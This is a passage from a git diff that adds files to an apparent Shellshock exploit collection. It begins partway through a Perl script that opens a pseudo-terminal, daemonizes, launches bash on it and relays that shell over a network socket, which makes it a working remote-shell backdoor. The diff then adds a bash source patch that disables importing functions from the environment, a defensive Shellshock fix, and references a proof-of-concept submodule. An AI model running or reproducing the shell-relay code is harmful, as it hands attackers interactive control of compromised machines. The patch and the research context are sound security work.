+) or die $!; + +print "ok\nAllocatig pseudo terminal... "; + +## ptsname +sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!; +$tmp=''; +ioctl (PTMX, $TIOCGPTN, $tmp) or die $!; +$pts = unpack('i', $tmp); + +print "/dev/pts/$pts\nInitializing pseudo terminal... "; + +## grantpt not needed on devpts + +## unlockpt +$unlock=pack('i', 0); +ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!; + +## prepare daemonizing +chdir '/' or die $!; +open STDIN, '/dev/null' or die $!; +umask 0; + +print "ok\nForking shell thread..."; + +defined($pid = fork) or die $!; +exit if $pid; +defined($pid = fork) or die $!; +if (!$pid) { + exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or + exec("/bin/bash /dev/pts/$pts 2>/dev/pts/$pts") or + die $!; + exit; +} + +print "ok\nHave fun!\n"; + +open STDOUT, '>>/dev/null' or die $!; +open STDERR, '>>/dev/null' or die $!; + +$pp = PTMX; +$rin=$win=$ein=''; +vec($rin,fileno($pp),1) =1; +vec($rin,fileno($sock),1) = 1; + +select $sock; +$|=1; +select PTMX; +$|=1; +select STDOUT; +$|=1; +$finished=0; + +sub forwarddata { + my ($from,$to) = @_; + while(1) { + $rv = sysread($from, $buff, 1024); + last if (!defined($rv) && $! == $EAGAIN); + defined($rv) or die $!; + if ($rv == 0) { $finished = 1; last;} + while(length $buff > 0) { + $rv = syswrite($to, $buff, length $buff); + if (!defined($rv) && $! == $EAGAIN) { + ## try again + next; + } + defined($rv) or die $!; + last if ($rv == length $buff); + substr($buff,0,$rv) = ''; + } + } +} + +while(! $finished) { + $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef); + die $! if ($nfound == -1); + forwarddata($pp,$sock); + last if $finished; + forwarddata($sock,$pp); + last if $finished; +} +close PTMX; +close $sock; \ No newline at end of file diff --git a/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh b/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh new file mode 100644 index 0000000..ef7ad13 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh @@ -0,0 +1,106 @@ +#shellshock fix. Nuke the whole feature from orbit, it's the only way to be sure. -@andreasdotorg + +diff --git a/variables.c b/variables.c +index cdc54bc..1a98efa 100644 +--- a/variables.c ++++ b/variables.c +@@ -347,85 +347,25 @@ initialize_shell_variables (env, privmode) + + temp_var = (SHELL_VAR *)NULL; + +- /* If exported function, define it now. Don't import functions from +- the environment in privileged mode. */ +- if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4)) ++ ro = 0; ++ if (posixly_correct && STREQ (name, "SHELLOPTS")) + { +- string_length = strlen (string); +- temp_string = (char *)xmalloc (3 + string_length + char_index); +- +- strcpy (temp_string, name); +- temp_string[char_index] = ' '; +- strcpy (temp_string + char_index + 1, string); +- +- if (posixly_correct == 0 || legal_identifier (name)) +- parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST); +- +- /* Ancient backwards compatibility. Old versions of bash exported +- functions like name()=() {...} */ +- if (name[char_index - 1] == ')' && name[char_index - 2] == '(') +- name[char_index - 2] = '\0'; +- +- if (temp_var = find_function (name)) +- { +- VSETATTR (temp_var, (att_exported|att_imported)); +- array_needs_making = 1; +- } +- else +- { +- if (temp_var = bind_variable (name, string, 0)) +- { +- VSETATTR (temp_var, (att_exported | att_imported | att_invisible)); +- array_needs_making = 1; +- } +- last_command_exit_value = 1; +- report_error (_("error importing function definition for `%s'"), name); +- } +- +- /* ( */ +- if (name[char_index - 1] == ')' && name[char_index - 2] == '\0') +- name[char_index - 2] = '('; /* ) */ ++ temp_var = find_variable ("SHELLOPTS"); ++ ro = temp_var && readonly_p (temp_var); ++ if (temp_var) ++ VUNSETATTR (temp_var, att_readonly); + } +-#if defined (ARRAY_VARS) +-# if ARRAY_EXPORT +- /* Array variables may not yet be exported. */ +- else if (*string == '(' && string[1] == '[' && string[strlen (string) - 1] == ')') ++ temp_var = bind_variable (name, string, 0); ++ if (temp_var) + { +- string_length = 1; +- temp_string = extract_array_assignment_list (string, &string_length); +- temp_var = assign_array_from_string (name, temp_string); +- FREE (temp_string); +- VSETATTR (temp_var, (att_exported | att_imported)); ++ if (legal_identifier (name)) ++ VSETATTR (temp_var, (att_exported | att_imported)); ++ else ++ VSETATTR (temp_var, (att_exported | att_imported | att_invisible)); ++ if (ro) ++ VSETATTR (temp_var, att_readonly); + array_needs_making = 1; + } +-# endif /* ARRAY_EXPORT */ +-#endif +-#if 0 +- else if (legal_identifier (name)) +-#else +- else +-#endif +- { +- ro = 0; +- if (posixly_correct && STREQ (name, "SHELLOPTS")) +- { +- temp_var = find_variable ("SHELLOPTS"); +- ro = temp_var && readonly_p (temp_var); +- if (temp_var) +- VUNSETATTR (temp_var, att_readonly); +- } +- temp_var = bind_variable (name, string, 0); +- if (temp_var) +- { +- if (legal_identifier (name)) +- VSETATTR (temp_var, (att_exported | att_imported)); +- else +- VSETATTR (temp_var, (att_exported | att_imported | att_invisible)); +- if (ro) +- VSETATTR (temp_var, att_readonly); +- array_needs_making = 1; +- } +- } + + name[char_index] = '='; + /* temp_var can be NULL if it was an exported function with a syntax \ No newline at end of file diff --git a/OS_Injections/ShellShocker/shellshocker-pocs b/OS_Injections/ShellShocker/shellshocker-pocs new file mode 160000 index 0000000..3a4706e --- /dev/null +++ b/OS_Injections/ShellShocker/shellshocker-pocs @@ -0,0 +1 @@ +Subproject commit 3a4706e51449753b16a6b1d761276ec791129f4c